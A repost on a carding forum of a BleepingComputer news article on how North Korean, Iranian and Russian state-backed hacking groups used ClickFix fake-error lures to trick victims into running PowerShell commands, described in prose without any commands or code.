Carder.life

Carder.life (http://txgate.io:443/index.php)
-   Carding News (http://txgate.io:443/forumdisplay.php?f=38)
-   -   State-sponsored hackers embrace ClickFix social engineering tactic (http://txgate.io:443/showthread.php?t=51296642)

WWW 05-26-2025 12:00 PM
<div id="post_message_787078">

ClickFix attacks are gaining traction among threat actors, with multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopting the technique in recent espionage campaigns.<br/>
<br/>
ClickFix is a social engineering tactic where malicious websites impersonate legitimate software or document-sharing platforms. Targets are lured via phishing or malvertising and shown fake error messages that claim a document or download failed.<br/>
<br/>
Victims are then prompted to click a "Fix" button, which instructs them to run a PowerShell or command-line script, leading to the execution of malware on their devices.<br/>
<br/>
Microsoft's Threat Intelligence team reported last February that the North Korean state actor 'Kimsuky' was also using it as part of a fake "device registration" web page.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/February/admin-exec.jpeg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

ClickFix page for fake device registration

</td>
</tr>
</table>
</div>A <a href="https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix" target="_blank">new report from Proofpoint</a> reveals that, between late 2024 and early 2025, Kimsuky (North Korea), MuddyWater (Iran), and also APT28 and UNK_RemoteRogue (Russia) have all used ClickFix in their targeted espionage operations.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/April/timeline.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Timeline of ClickFix attacks

</td>
</tr>
</table>
</div><b><font size="4"><font color="White">ClickFix enabling intelligence operations</font></font></b><br/>
<br/>
Starting with Kimsuky, the attacks were observed between January and February 2025, targeting think tanks focused on North Korea-related policy.<br/>
<br/>
The DPRK hackers used spoofed Korean, Japanese, or English emails to appear as if the sender was a Japanese diplomat to initiate contact with the target.<br/>
<br/>
After establishing trust, the attackers sent a malicious PDF file linking to a fake secure drive that prompted the target to "register" by manually copying a PowerShell command into their terminal.<br/>
<br/>
Doing so fetched a second script that set up scheduled tasks for persistence and downloaded QuasarRAT while displaying a decoy PDF to the victim for diversion.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/April/quasar.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Kimsuky attack flow

</td>
</tr>
</table>
</div>The MuddyWater attacks took place in mid-November 2024, targeting 39 organizations in the Middle East with emails disguised as Microsoft security alerts.<br/>
<br/>
Recipients were informed that they needed to apply a critical security update by running PowerShell as admin on their computers. This resulted in self-infections with 'Level,' a remote monitoring and management (RMM) tool that can facilitate espionage operations.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/April/muddywater.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

The MuddyWater pish

</td>
</tr>
</table>
</div>The third case concerns the Russian threat group UNK_RemoteRogue, which targeted two organizations closely related to a major arms manufacturer in December 2024.<br/>
<br/>
The malicious emails sent from compromised Zimbra servers spoofed Microsoft Office. Clicking on the embedded link took targets to a fake Microsoft Word page with instructions in Russian and a YouTube video tutorial.<br/>
<br/>
Running the code executed JavaScript that launched PowerShell to connect to a server running the Empire command and control (C2) framework.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/u/1220909/2025/April/document.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Landing page spoofing a Word document

</td>
</tr>
</table>
</div>Proofpoint reports that APT28, a GRU unit, also used ClickFix as early as October 2024, using phishing emails mimicking a Google Spreadsheet, a reCAPTCHA step, and PowerShell execution instructions conveyed via a pop-up.<br/>
<br/>
Victims running those commands unknowingly set up an SSH tunnel and launched Metasploit, providing attackers with backdoor access to their systems.<br/>
<br/>
ClickFix remains an effective method, as evidenced by its adoption across multiple state-backed groups, driven by the lack of awareness of unsolicited command execution.<br/>
<br/>
As a general rule, users should never execute commands they don't understand or copy from online sources, especially with administrator privileges.<br/>
<br/>
<a href="https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic/" target="_blank">@ BleepingComputer </a>
</div>


All times are GMT. The time now is 08:54 PM.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.